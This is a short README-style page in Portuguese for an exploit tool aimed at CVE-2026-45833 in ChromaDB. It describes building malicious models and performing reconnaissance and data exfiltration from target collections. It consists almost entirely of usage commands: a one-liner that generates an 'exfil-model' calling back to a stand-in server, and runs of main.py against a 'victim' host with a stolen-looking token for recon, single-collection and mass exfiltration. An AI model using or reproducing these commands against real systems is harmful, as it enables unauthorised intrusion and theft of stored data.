
Ferramenta de exploração para CVE-2026-45833 no ChromaDB, permitindo geração de modelos maliciosos, reconhecimento e exfiltração de dados de coleções alvo via API HTTP.
CVE-2026-45833 ChromaDB USE POR SUA CONTA E RISCO ALGUM CÓDIGO PRECISA SER MODIFICADO.
python3 -c " from main import MaliciousModelGenerator gen = MaliciousModelGenerator() gen.generate_model('exfil-model', 'exfil_env', { 'exfil_url': 'http://your-server.com/callback' }) "
python3 main.py --target http://victim:8000
--token "eyJ..."
--action recon
python3 main.py --target http://victim:8000
--token "eyJ..."
--collection "coll-id-here"
--model "your-username/exfil-model"
python3 main.py --target http://victim:8000
--token "eyJ..."
--action mass
--model "your-username/exfil-model"